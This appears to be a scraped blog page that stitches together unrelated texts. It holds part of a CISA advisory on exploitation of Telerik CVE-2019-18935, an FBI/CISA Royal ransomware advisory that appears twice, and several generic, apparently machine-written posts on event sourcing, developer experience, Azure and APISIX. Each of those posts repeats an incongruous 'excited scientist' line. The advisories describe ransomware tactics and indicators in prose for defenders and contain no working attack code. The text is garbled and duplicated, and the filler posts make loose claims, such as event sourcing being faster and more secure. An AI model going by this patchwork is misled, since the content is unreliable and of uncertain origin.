Convert any discovered malicious DLL timestamps to readable format.
Export the Windows security event and PowerShell logs from the device.
Search for new processes created via w3wp.exe in Windows security event logs (e.g., Windows EventID 4688 New Process created).
Search for new PIDs from identified events. Investigate to determine if they spawned any other processes.
Example: CMD.EXE launching PowerShell or running other commands such as nslookup or netstat. Note: This is not an exhaustive list.
Search for EventID 600 in PowerShell logs.
Trellix XDR Platform Searching
If Trellix XDR Platform is deployed in an environment and a standard HX triage audit is completed in a timely manner of the suspected use of CVE-2019-18935, an organization can search for file write events from known web processes. This will identify the executables written by the web server process. CISA and authoring organizations specifically recommend searching for the following field value pair:
Table 9: Field Value Pair for Searching
Field
Value Begins With
TextAtLowestOffset
MZ
MITIGATIONS
Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Manage Vulnerabilities and Configurations
Upgrade all instances of Telerik UI ASP.NET AJAX to the latest version after appropriate testing. Keep all software up to date and prioritize patching to known exploited vulnerabilities (KEVs). [CPG 5.1]
Implement a patch management solution to ensure compliance with the latest security patches. A patch management solution that inventories all software running in addition to vulnerability scanning is recommended.
Ensure vulnerability scanners are configured to scan a comprehensive scope of devices and locations. For example, as noted in the Technical Details section, the victim organization had the appropriate plugin for CVE-2019-18935, but the vulnerability went undetected due to the Telerik UI software being installed in a file path not typically scanned. To identify unpatched instances of software vulnerabilities, organizations using vulnerability scanners should be aware that all installations may not be considered “typical” and may require full file scans of web applications.
Note: Vulnerability scanners may have limitations in detecting vulnerabilities, such as only being able to identify Windows Installer-installed applications, which was the case with this agency’s vulnerability scanner. The Telerik UI software was installed via a continuous integration (CI) and continuous delivery (CD) pipeline rather than the Windows Installer. This highlights the importance of using a comprehensive approach for vulnerability scanning that considers all potential installation methods and file paths.
Validate output from patch management and vulnerability scanning solutions against running services to check for discrepancies and account for all services.
Segment Networks Based on Function
Implement network segmentation to separate network segments based on role and functionality. Proper network segmentation significantly reduces the ability for threat actor lateral movement by controlling traffic flows between—and access to—various subnetworks. (See CISA’s Layering Network Security Through Segmentation infographic and the National Security Agency’s Segment Networks and Deploy Application-Aware Defenses.) [CPG 8.1]
Isolate similar systems and implement micro-segmentation with granular access and policy restrictions to modernize cybersecurity and adopt zero trust principles for both network perimeter and internal devices. Logical and physical segmentation are critical to limiting and preventing lateral movement, privilege escalation, and exfiltration. Utilize access control lists (ACLs), hardened firewalls, and network monitoring devices to regulate, monitor, and audit cross-segment access and data transfers.
MFA can still be leveraged for secure access using a jump server—an asset placed between the external and internal networks that serves as an intermediary for access—to facilitate connections if assets do not have the capability to support MFA implementation.
For additional guidance on secure MFA configurations, visit cisa.gov/mfa. [CPG 1.3]
Monitor and analyze activity logs generated from Microsoft IIS and remote PowerShell. Collect access and security focused logs (IDS/IDPS, firewall, DLP, VPN) and ensure logs are securely stored for a specified duration informed by risk or pertinent regulatory guidance. [CPG 3.1, 3.2]
Evaluate user permissions and maintain separate user accounts for all actions and activities not associated with the administrator role, e.g., for business email, web browsing, etc. All privileges should be reevaluated on a recurring basis to validate continued need for a given set of permissions. [CPG 1.5]
Limit service accounts to the minimum permissions necessary to run services. CISA observed numerous error messages in network logs indicative of failed attempts to write files to additional directories or move laterally.
Maintain a robust asset management policy through comprehensive documentation of assets, tracking current version information to maintain awareness of outdated software, and mapping assets to business and critical functions.
Determine the need and functionality of assets that require public internet exposure. [CPG 2.3]
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, CISA, FBI, and MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and co-sealers recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
Select an ATT&CK technique described in this advisory (see Table 4).
Align your security technologies against the selected technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies’ performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program—including people, processes, and technologies—based on the data generated by this process.
CISA, FBI, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
https://ankaa-pmo.com/wp-content/uploads/2017/04/Logo-Ankaa-engineering.png00Service comm.https://ankaa-pmo.com/wp-content/uploads/2017/04/Logo-Ankaa-engineering.pngService comm.2023-03-13 18:57:572023-03-13 18:57:57Threat Actors Exploit Progress Telerik Vulnerability in U.S. Government IIS Server
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
Actions to take today to mitigate cyber threats from ransomware:
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known Royal ransomware IOCs and TTPs identified through FBI threat response activities as recently as January 2023.
Since approximately September 2022, cyber criminals have compromised U.S. and international organizations with a Royal ransomware variant. FBI and CISA believe this variant, which uses its own custom-made file encryption program, evolved from earlier iterations that used “Zeon” as a loader. After gaining access to victims’ networks, Royal actors disable antivirus software and exfiltrate large amounts of data before ultimately deploying the ransomware and encrypting the systems. Royal actors have made ransom demands ranging from approximately $1 million to $11 million USD in Bitcoin. In observed incidents, Royal actors do not include ransom amounts and payment instructions as part of the initial ransom note. Instead, the note, which appears after encryption, requires victims to directly interact with the threat actor via a .onion URL (reachable through the Tor browser). Royal actors have targeted numerous critical infrastructure sectors including, but not limited to, Manufacturing, Communications, Healthcare and Public Healthcare (HPH), and Education.
FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.
Royal ransomware uses a unique partial encryption approach that allows the threat actor to choose a specific percentage of data in a file to encrypt. This approach allows the actor to lower the encryption percentage for larger files, which helps evade detection.[1] In addition to encrypting files, Royal actors also engage in double extortion tactics in which they threaten to publicly release the encrypted data if the victim does not pay the ransom.
Initial Access
Royal actors gain initial access to victim networks in a number of ways including:
Phishing. According to third-party reporting, Royal actors most commonly (in 66.7% of incidents) gain initial access to victim networks via successful phishing emails [T1566].
According to open-source reporting, victims have unknowingly installed malware that delivers Royal ransomware after receiving phishing emails containing malicious PDF documents [T1566.001], and malvertising [T1566.002].[2]
Remote Desktop Protocol (RDP). The second most common vector Royal actors use (in 13.3% of incidents) for initial access is RDP compromise.
Public-facing applications. FBI has also observed Royal actors gain initial access through exploiting public-facing applications [T1190].
Brokers. Reports from trusted third-party sources indicate that Royal actors may leverage brokers to gain initial access and source traffic by harvesting virtual private network (VPN) credentials from stealer logs.
Command and Control
Once Royal actors gain access to the network, they communicate with command and control (C2) infrastructure and download multiple tools [T1105]. Legitimate Windows software is repurposed by Royal operators to strengthen their foothold in the victim’s network. Ransomware operators often use open-source projects to aid their intrusion activities; Royal operators have recently been observed using Chisel, a tunneling tool transported over HTTP and secured via SSH [T1572], to communicate with their C2 infrastructure. FBI has observed multiple Qakbot C2s used in Royal ransomware attacks, but has not yet determined if Royal ransomware exclusively uses Qakbot C2s.
Lateral Movement and Persistence
Royal actors often use RDP to move laterally across the network [T1021.001]. Microsoft Sysinternals tool PsExec has also been used to aid lateral movement. FBI has observed Royal actors using remote monitoring and management (RMM) software, such as AnyDesk, LogMeIn, and Atera, for persistence in the victim’s network [T1133]. In some instances, the actors moved laterally to the domain controller. In one confirmed case, the actors used a legitimate admin account to remotely log on to the domain controller [T1078]. Once on the domain controller, the threat actor deactivated antivirus protocols [T1562.001] by modifying Group Policy Objects [T1484.001].
Exfiltration
Royal actors exfiltrate data from victim networks by repurposing legitimate cyber pentesting tools, such as Cobalt Strike, and malware tools and derivatives, such as Ursnif/Gozi, for data aggregation and exfiltration. According to third-party reporting, Royal actors’ first hop in exfiltration and other operations is usually a U.S. IP address.
Note: In reference to Cobalt Strike and other tools mentioned above, a tool repository used by Royal was identified at IP: 94.232.41[.]105 in December 2022.
Encryption
Before starting the encryption process, Royal actors:
Use Windows Restart Manager to determine whether targeted files are currently in use or blocked by other applications [T1486].[1]
Use Windows Volume Shadow Copy service (vssadmin.exe) to delete shadow copies to prevent system recovery.[1]
FBI has found numerous batch (.bat) files on impacted systems which are typically transferred as an encrypted 7zip file. Batch files create a new admin user [T1078.002], force a group policy update, set pertinent registry keys to auto-extract [T1119] and execute the ransomware, monitor the encryption process, and delete files upon completion—including Application, System, and Security event logs [T1070.001].
Malicious files have been found in victim networks in the following directories:
C:Temp
C:UsersAppDataRoaming
C:Users
C:ProgramData
Indicators of Compromise (IOC)
See table 1 and 2 for Royal ransomware IOCs that FBI obtained during threat response activities as of January 2023. Note: Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.
Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023
The actors encrypted data to determine which files were being used or blocked by other applications.
MITIGATIONS
FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA’s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, tactics, techniques, and procedures, and which yield goals that all organizations across critical infrastructure sectors should implement:
Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).
Refrain from requiring password changes more frequently than once per year. Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password patterns cyber criminals can easily decipher.
Require administrator credentials to install software.
Require multifactor authentication [CPG 1.3] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.
Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.
Segment networks [CPG 8.1]. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement.
Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting ransomware, implement a tool that logs and reports all network traffic [CPG 5.1], including lateral movement activity on a network. Endpoint detection and response (EDR) tools are useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
Install, regularly update, and enable real time detection for antivirus software on all hosts.
Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.
Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 1.5].
Disable unused ports.
Consider adding an email banner to emails [CPG 8.3] received from outside your organization.
Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.
Maintain offline backups of data, and regularly maintain backup and restoration [CPG 7.3]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.
Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 3.3].
RESOURCES
Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.
FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Royal actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
Additional details requested include: a targeted company Point of Contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, host and network based indicators.
FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, or CISA at https://www.cisa.gov/report.
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI.
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
Actions to take today to mitigate cyber threats from ransomware:
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known Royal ransomware IOCs and TTPs identified through FBI threat response activities as recently as January 2023.
Since approximately September 2022, cyber criminals have compromised U.S. and international organizations with a Royal ransomware variant. FBI and CISA believe this variant, which uses its own custom-made file encryption program, evolved from earlier iterations that used “Zeon” as a loader. After gaining access to victims’ networks, Royal actors disable antivirus software and exfiltrate large amounts of data before ultimately deploying the ransomware and encrypting the systems. Royal actors have made ransom demands ranging from approximately $1 million to $11 million USD in Bitcoin. In observed incidents, Royal actors do not include ransom amounts and payment instructions as part of the initial ransom note. Instead, the note, which appears after encryption, requires victims to directly interact with the threat actor via a .onion URL (reachable through the Tor browser). Royal actors have targeted numerous critical infrastructure sectors including, but not limited to, Manufacturing, Communications, Healthcare and Public Healthcare (HPH), and Education.
FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.
Royal ransomware uses a unique partial encryption approach that allows the threat actor to choose a specific percentage of data in a file to encrypt. This approach allows the actor to lower the encryption percentage for larger files, which helps evade detection.[1] In addition to encrypting files, Royal actors also engage in double extortion tactics in which they threaten to publicly release the encrypted data if the victim does not pay the ransom.
Initial Access
Royal actors gain initial access to victim networks in a number of ways including:
Phishing. According to third-party reporting, Royal actors most commonly (in 66.7% of incidents) gain initial access to victim networks via successful phishing emails [T1566].
According to open-source reporting, victims have unknowingly installed malware that delivers Royal ransomware after receiving phishing emails containing malicious PDF documents [T1566.001], and malvertising [T1566.002].[2]
Remote Desktop Protocol (RDP). The second most common vector Royal actors use (in 13.3% of incidents) for initial access is RDP compromise.
Public-facing applications. FBI has also observed Royal actors gain initial access through exploiting public-facing applications [T1190].
Brokers. Reports from trusted third-party sources indicate that Royal actors may leverage brokers to gain initial access and source traffic by harvesting virtual private network (VPN) credentials from stealer logs.
Command and Control
Once Royal actors gain access to the network, they communicate with command and control (C2) infrastructure and download multiple tools [T1105]. Legitimate Windows software is repurposed by Royal operators to strengthen their foothold in the victim’s network. Ransomware operators often use open-source projects to aid their intrusion activities; Royal operators have recently been observed using Chisel, a tunneling tool transported over HTTP and secured via SSH [T1572], to communicate with their C2 infrastructure. FBI has observed multiple Qakbot C2s used in Royal ransomware attacks, but has not yet determined if Royal ransomware exclusively uses Qakbot C2s.
Lateral Movement and Persistence
Royal actors often use RDP to move laterally across the network [T1021.001]. Microsoft Sysinternals tool PsExec has also been used to aid lateral movement. FBI has observed Royal actors using remote monitoring and management (RMM) software, such as AnyDesk, LogMeIn, and Atera, for persistence in the victim’s network [T1133]. In some instances, the actors moved laterally to the domain controller. In one confirmed case, the actors used a legitimate admin account to remotely log on to the domain controller [T1078]. Once on the domain controller, the threat actor deactivated antivirus protocols [T1562.001] by modifying Group Policy Objects [T1484.001].
Exfiltration
Royal actors exfiltrate data from victim networks by repurposing legitimate cyber pentesting tools, such as Cobalt Strike, and malware tools and derivatives, such as Ursnif/Gozi, for data aggregation and exfiltration. According to third-party reporting, Royal actors’ first hop in exfiltration and other operations is usually a U.S. IP address.
Note: In reference to Cobalt Strike and other tools mentioned above, a tool repository used by Royal was identified at IP: 94.232.41[.]105 in December 2022.
Encryption
Before starting the encryption process, Royal actors:
Use Windows Restart Manager to determine whether targeted files are currently in use or blocked by other applications [T1486].[1]
Use Windows Volume Shadow Copy service (vssadmin.exe) to delete shadow copies to prevent system recovery.[1]
FBI has found numerous batch (.bat) files on impacted systems which are typically transferred as an encrypted 7zip file. Batch files create a new admin user [T1078.002], force a group policy update, set pertinent registry keys to auto-extract [T1119] and execute the ransomware, monitor the encryption process, and delete files upon completion—including Application, System, and Security event logs [T1070.001].
Malicious files have been found in victim networks in the following directories:
C:Temp
C:UsersAppDataRoaming
C:Users
C:ProgramData
Indicators of Compromise (IOC)
See table 1 and 2 for Royal ransomware IOCs that FBI obtained during threat response activities as of January 2023. Note: Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.
Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023
The actors encrypted data to determine which files were being used or blocked by other applications.
MITIGATIONS
FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA’s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, tactics, techniques, and procedures, and which yield goals that all organizations across critical infrastructure sectors should implement:
Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).
Refrain from requiring password changes more frequently than once per year. Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password patterns cyber criminals can easily decipher.
Require administrator credentials to install software.
Require multifactor authentication [CPG 1.3] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.
Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.
Segment networks [CPG 8.1]. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement.
Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting ransomware, implement a tool that logs and reports all network traffic [CPG 5.1], including lateral movement activity on a network. Endpoint detection and response (EDR) tools are useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
Install, regularly update, and enable real time detection for antivirus software on all hosts.
Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.
Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 1.5].
Disable unused ports.
Consider adding an email banner to emails [CPG 8.3] received from outside your organization.
Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.
Maintain offline backups of data, and regularly maintain backup and restoration [CPG 7.3]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.
Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 3.3].
RESOURCES
Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.
FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Royal actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
Additional details requested include: a targeted company Point of Contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, host and network based indicators.
FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, or CISA at https://www.cisa.gov/report.
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI.
Event sourcing and databases have been the go-to solutions for data storage, but what’s the next step? Let’s explore the pros and cons of each and see what the future holds.
## Understanding Event Sourcing and Its Popularity
I am an excited scientist who has made a sensational discovery about event sourcing and its potential to outgrow databases. Event sourcing is a powerful tool that is being adopted by many large organizations as their database architectural design. It has the capability to scale up and serve the needs of the modern data industry.
Event sourcing is a process of storing data in an event log, which is an append-only store. This means that all changes to the data are recorded as a sequence of events. This makes it easier to track changes over time and allows for easy replication of data. Event sourcing also allows for easy scalability, as the data can be replicated across multiple servers.
The popularity of event sourcing is growing rapidly, as it offers many advantages over traditional databases. Event sourcing allows for faster data retrieval, as it stores data in an append-only store. This makes it easier to query and analyze data over time. It also allows for better scalability, as the data can be replicated across multiple servers. Additionally, event sourcing is more secure than traditional databases, as it is append-only and does not allow for any changes to be made to the data.
So, is event sourcing going to outgrow databases? It is hard to say for sure, but the advantages offered by event sourcing make it a strong contender for replacing traditional databases. Event sourcing allows for faster data retrieval, better scalability, and improved security. As more organizations begin to adopt event sourcing, it is likely that it will become the preferred choice for many applications.
Découvrez quelles sont les métriques les plus importantes pour un développeur afin d’améliorer son expérience.
## Developer Experience (DevEx or DX)
Le développeur expérience. Si vous fournissez des API ou des produits axés sur les API, vous entendez probablement souvent ce terme. Après tout, vous avez besoin de développeurs pour qu’une API réussisse – et s’ils n’ont pas une excellente expérience, ils passeront à autre chose.
Qu’est-ce que l’expérience du développeur?
L’expérience du développeur (DevEx ou DX) est une extension de l’expérience utilisateur (UX) où l’accent est mis sur les utilisateurs touchés par le côté technique des choses – par exemple, les outils, les langages et les flux de travail. Mais DevEx va bien au-delà de «UX pour les développeurs»: cela signifie s’assurer que les développeurs peuvent facilement comprendre et exploiter une API pour leurs propres applications et cas d’utilisation. Une excellente DevEx se produit lorsque vous communiquez avec vos utilisateurs développeurs, en comprenant et en répondant directement à leurs besoins. Si vous pouvez gagner les développeurs, vous pouvez construire un grand et prospère écosystème autour de vos produits.
Le code est le cœur de l’expérience du développeur. C’est la partie la plus importante de DevEx, car c’est ce qui permet aux développeurs de créer des applications qui exploitent votre API. Les bons outils de codage sont essentiels pour donner aux développeurs une expérience cohérente et agréable. Les outils doivent être faciles à apprendre et à utiliser, et doivent offrir des fonctionnalités intuitives. Les bons outils de codage peuvent aider les développeurs à créer rapidement des applications robustes et fiables qui tirent parti de votre API.
Enfin, une bonne expérience du développeur nécessite une documentation complète et précise. La documentation doit être claire et concise, et doit fournir aux développeurs toutes les informations dont ils ont besoin pour comprendre et utiliser votre API. La documentation doit également inclure des exemples clairs et des tutoriels pour aider les développeurs à comprendre comment votre API fonctionne et à créer rapidement des applications qui en tirent parti. Une bonne documentation peut faire toute la différence entre un développeur qui comprend votre API et un développeur qui abandonne.
En résumé, l’expérience du développeur est essentielle pour le succès d’une API. Pour offrir une expérience exceptionnelle aux développeurs, vous devez mettre l’accent sur le codage, fournir des outils intuitifs et faciles à utiliser, et fournir une documentation complète et précise. Si vous pouvez offrir une expérience exceptionnelle aux développeurs, vous pouvez construire un grand écosystème autour de votre produit et réussir à long terme. En tant que scientifique enthousiaste qui vient de faire une sensationnelle découverte, je suis convaincu que l’expérience du développeur est la clé du succès d’une API.
https://ankaa-pmo.com/wp-content/uploads/2023/02/experience-developpeur-les-metriques-les-plus-importantes.jpg375600Service comm.https://ankaa-pmo.com/wp-content/uploads/2017/04/Logo-Ankaa-engineering.pngService comm.2023-02-12 17:56:322023-02-13 11:21:55Expérience développeur: les métriques les plus importantes
Microsoft Azure is a cloud computing platform and infrastructure created by Microsoft for building, deploying, and managing applications and services through a global network of Microsoft-managed data centers. It provides a range of cloud services, including compute, storage, analytics, networking, and identity management. Azure is designed to help organizations of all sizes quickly and cost-effectively develop, deploy, and manage applications and services in the cloud.
Azure offers a wide range of services that can be used to build, deploy, and manage applications and services in the cloud. These include compute, storage, analytics, networking, and identity management. Compute services provide access to virtual machines, containers, and serverless computing resources. Storage services provide access to object storage, file storage, and databases. Analytics services provide access to data analysis tools such as machine learning, data warehousing, and big data processing. Networking services provide access to virtual networks, DNS, load balancing, and traffic management. Identity management services provide access to authentication and authorization services.
Azure also provides a range of tools and services that can be used to manage applications and services in the cloud. These include Azure Resource Manager (ARM), which provides a unified way to deploy, manage, and monitor resources in the cloud; Azure Automation, which provides a way to automate tasks; and Azure Monitor, which provides a way to monitor the performance of applications and services in the cloud. Additionally, Azure provides a range of security features such as encryption, identity management, and access control. These features help ensure that applications and services are secure and compliant with industry standards.
In conclusion, Microsoft Azure is a powerful cloud computing platform and infrastructure that provides a wide range of services for building, deploying, and managing applications and services in the cloud. It offers a range of compute, storage, analytics, networking, and identity management services that can be used to quickly and cost-effectively develop, deploy, and manage applications and services in the cloud. Additionally, it provides a range of tools and services for managing applications and services in the cloud as well as a range of security features for ensuring that applications and services are secure and compliant with industry standards.
https://ankaa-pmo.com/wp-content/uploads/2023/02/empty.png512512Service comm.https://ankaa-pmo.com/wp-content/uploads/2017/04/Logo-Ankaa-engineering.pngService comm.2023-02-11 22:45:382023-02-11 22:53:28Microsoft Azure is a cloud computing platform and infrastructure
Contextual advertising is a powerful tool for businesses to reach their target audience with relevant, targeted ads. Learn how it works and its potential to drive sales!
## The Full Context: A Software Project’s Aura
I am an excited scientist who has made a sensational discovery: coding is the key to unlocking The Full Context. By coding, I mean writing code that is both readable and maintainable. It’s not just about writing code that works; it’s about writing code that is easy to understand and modify.
Coding is the foundation of The Full Context. It is the language that allows us to communicate our ideas, our intentions, and our decisions to the software. It is the bridge between the project’s stakeholders and the software itself. Without coding, there would be no way to effectively communicate the project’s requirements to the software.
Coding is also the key to unlocking the potential of The Full Context. By writing code that is both readable and maintainable, we can ensure that the project’s requirements are accurately represented in the software. We can also ensure that future changes and modifications can be made quickly and easily. This allows us to keep up with the ever-changing requirements of the project, while still maintaining a high level of quality.
The Full Context is a powerful tool that can be used to create amazing software projects. But without coding, it would remain just a concept, never fully realized. By coding, we can unlock its potential and create projects that are both powerful and maintainable. This is why coding is so important; it is the key to unlocking The Full Context and creating amazing software projects.
Microsoft Azure is a cloud computing platform and infrastructure created by Microsoft for building, deploying, and managing applications and services through a global network of Microsoft-managed data centers. It provides software as a service (SaaS), platform as a service (PaaS) and infrastructure as a service (IaaS) and supports many different programming languages, tools, and frameworks, including both Microsoft-specific and third-party software and systems.
Azure provides a comprehensive set of cloud services that enable organizations to build, deploy, and manage applications across a global network of Microsoft-managed data centers. It offers a wide range of services, including virtual machines, storage, databases, networking, analytics, and more. It also provides tools for developing and managing applications, such as Visual Studio, Azure DevOps, and Azure Machine Learning.
Azure enables organizations to quickly and easily deploy applications and services to the cloud. It provides a secure, reliable, and cost-effective platform for running applications in the cloud. It also provides a range of services for managing and monitoring applications and services, including Azure Monitor, Azure Security Center, and Azure Automation. Additionally, it offers advanced analytics capabilities with Azure Machine Learning and Azure Cognitive Services.
In addition to providing cloud services, Azure also offers a range of tools for developing and managing applications. It provides a range of development tools such as Visual Studio Code, Visual Studio Team Services, and Azure DevOps. It also provides a range of services for managing applications such as Azure Resource Manager, Azure Automation, and Azure Monitor. Additionally, it provides a range of services for monitoring applications such as Azure Application Insights and Azure Security Center.
Azure also provides a range of services for storing data in the cloud. It offers a range of storage services such as Azure Blob Storage, Azure Files, Azure Queue Storage, and Azure Table Storage. It also provides a range of database services such as Azure SQL Database and Azure Cosmos DB. Additionally, it provides a range of services for managing data such as Azure Data Factory and Azure Data Lake.
Overall, Microsoft Azure is an incredibly powerful cloud computing platform that enables organizations to quickly and easily deploy applications and services to the cloud. It provides a secure, reliable, and cost-effective platform for running applications in the cloud. It also provides a range of tools for developing and managing applications as well as services for storing data in the cloud. With its comprehensive set of cloud services and tools, Microsoft Azure is an essential platform for any organization looking to take advantage of the power of the cloud.
Secure your APIs with Apache APISIX – the open source, high-performance API gateway that provides secure admin access.
Securing Your Apache APISIX Admin Access
I am an excited scientist who has made a sensational discovery: data security can be improved by protecting your Apache APISIX admin access. This is a critical component of your infrastructure, as it is responsible for routing traffic to the right places. If an attacker were to gain access to this, they could potentially redirect traffic to their own infrastructure, leading to data theft or financial losses.
To ensure the security of your data, it is essential to protect your Apache APISIX admin access. Here are a few ways to do this:
First, you should enable authentication for the admin API. This will require users to enter a username and password before they can access the API. You can also use two-factor authentication for additional security. Additionally, you should limit the IP addresses that are allowed to access the admin API. This will ensure that only trusted IP addresses can access the API and prevent unauthorized access.
Second, you should use TLS encryption for all communication with the admin API. This will ensure that all data is encrypted in transit and protect it from interception. Additionally, you should use a strong cipher suite to ensure that the data is encrypted with a strong algorithm.
